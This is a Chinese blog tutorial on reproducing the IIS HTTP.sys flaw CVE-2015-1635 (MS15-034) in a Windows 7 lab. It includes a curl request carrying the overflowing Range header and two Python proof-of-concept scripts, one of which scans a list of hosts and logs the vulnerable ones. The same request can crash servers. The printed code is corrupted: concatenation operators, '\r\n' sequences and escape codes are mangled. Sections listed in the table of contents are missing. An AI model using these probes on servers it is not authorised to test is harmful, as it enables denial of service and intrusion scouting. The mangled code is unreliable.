HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034[通俗易懂]

大家好，又见面了，我是你们的朋友全栈君。

漏洞概述

漏洞环境部署

漏洞验证

漏洞利用：ms15_034

漏洞防御

漏洞概述

HTTP.sys简介

HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序，为了优化IIS服务器性能，从IIS6.0引入，IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞

漏洞成因

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中，当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞

漏洞危害

攻击者只需要发送恶意的http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃。

影响版本

任何安装了微软IIS 6.0以上的的Windows 7、Windows Server 2008 R2、 Windows Server 2012 R2 、Windows Server 2012、Windows 8、2、Windows 8.1 系统

漏洞环境部署

环境部署：windows7下安装IIS服务

如果发现安装完成后，机子上仍没有IIS服务，建议查看以下win7的版本（桌面的计算机单击右键属性，即可查看），旗舰版、企业版和专业版有IIS功能，家庭版和简易版是没有的。需要将家庭版升级为旗舰版即可。

（升级办法可参考：http://jingyan.baidu.com/article/08b6a591ed82d314a809228d.html）

安装成功！打开即可，不作任何设置。

访问下当前IP地址，查看IIS版本

漏洞验证

靶机win7:192.168.109.132 攻击机kali：192.168.109.159

1.使用curl命令进行测试

curl http://192.168.109.132 -H “Host: 192.168.109.132” -H “Range: bytes=0-18446744073709551615”

返回416，说明该系统存在漏洞，其中Range字段值18446744073709551615表示：转为十六进制是 0xFFFFFFFFFFFFFFFF(16个F），是64位无符号整型所能表达的最大整数，整数溢出往往和这个超大整数有关。

CVE-2015-1635的详细分析可参考：

https://www.cnblogs.com/goabout2/p/4454294.html
http://blogs.360.cn/post/cve_2015_6135_http_rce_analysis.html

2.使用Python脚本验证：CVE-2015-1635-POC

验证脚本如下：

代码语言：javascript复制

#coding:utf-8

import socket
import random


ipAddr = "192.168.109.132"
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0rnrn"
req = "GET / HTTP/1.1rnHost: stuffrnRange: bytes=0-"   hexAllFfff   "rnrn"

print "[*] Audit Started"

try:
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((ipAddr, 80))
    client_socket.send(req1)
    boringResp = client_socket.recv(1024)
    if "Microsoft" not in boringResp:
                    print "[*] Not IIS"
                    exit(0)
    client_socket.close()
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect((ipAddr, 80))
    client_socket.send(req)
    goodResp = client_socket.recv(1024)
    if "Requested Range Not Satisfiable" in goodResp:
        print "[!!] Vulnerability MS15-034 existence!"
    elif " The request has an invalid header name" in goodResp:
        print "[*] Not Vulnerability."
    else:
        print "[*] Unknown response state."
                                
except Exception,e:
    print e

3.burpsuite抓包测试

4.Python脚本ms15-034 ：HTTP.sys的一个POC测试，使用方法如下：

代码语言：javascript复制

#!/usr/bin/env python
import requests

"""
@Zigoo0
Another testing methods.
curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/
"""
# Coloring class
class colors:
	def __init__(self):
		self.green = "33[92m"
		self.blue = "33[94m"
		self.bold = "33[1m"
		self.yellow = "33[93m"
		self.red = "33[91m"
		self.end = "33[0m"
color = colors()

banner = color.green '''
This is a test POC for:
MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution.
By Ebrahim Hegazy @Zigoo0 n''' color.end

print banner
#Reading hosts from a text file to test multiple sites.
hosts = open(raw_input('[*] Enter the name of the list file: ')).readlines()
#Vulnerable hosts will go here.
vulnerable = set()
#Fixed hosts will go here.
fixed = set()

#Defining the main function.
def main(url):
	print color.green "[*] Testing " color.end   url
	try:
		#Defining the Headers.
		headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", 
					"Accept-Encoding": "gzip, deflate",
					"Accept": "text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8",
					"Range": "bytes=0-18446744073709551615",
					"Referer": "https://github.com/zigoo0/", 
					"Connection": "keep-alive"
					}
		#Sending the Request.
		r = requests.get(url, headers=headers, verify=False, timeout=5)
		if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text:
			#print r.status_code.
			print "[*] %s"%(url)   color.red " is Vulnerable!n" color.end
			#Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host.
			vulnerable.add(url)
		else:
			#print r.status_code
			print "[*] Seems %s "%(url)   color.green " is not vulnerable!n" color.end
			#Adding the non-vulnerable hosts to a SET for later use.
			fixed.add(url)
	except Exception:
		pass


if __name__ == "__main__":
	for host in hosts:
		url = host.strip()
		main(url)
	#Printing the list of vulnerable sites.
	print color.red "[*] %s found to be vulnerable."%(len(vulnerable))  color.end
	for vuln in vulnerable:
		print "[-] ", vuln
		#Adding the vulnerable sites to a text file.
		vulnz = open('vulnerable-hosts.txt', 'a')
		vulnz.write(vuln "n")
	print color.blue "[*] Vulnerable hosts added to " color.end   "vulnerable-hosts.txt"
	#Printing the number of fixed/not-vulnerable hosts.
	print color.green "n[*] %s found to be NOT vulnerable."%(len(fixed))  color.end
	#printing the refferences.
	print color.green "n[*] Please follow below link for more details about this vulnerabability and How to FIX it." color.end
	print "[*] https://technet.microsoft.com/library/security/ms15-034"
	print "[*] https://technet.microsoft.com/en-us/library/security/ms15-apr.aspx"
	print color.green "[*] Don't forget to update your servers.n" color.end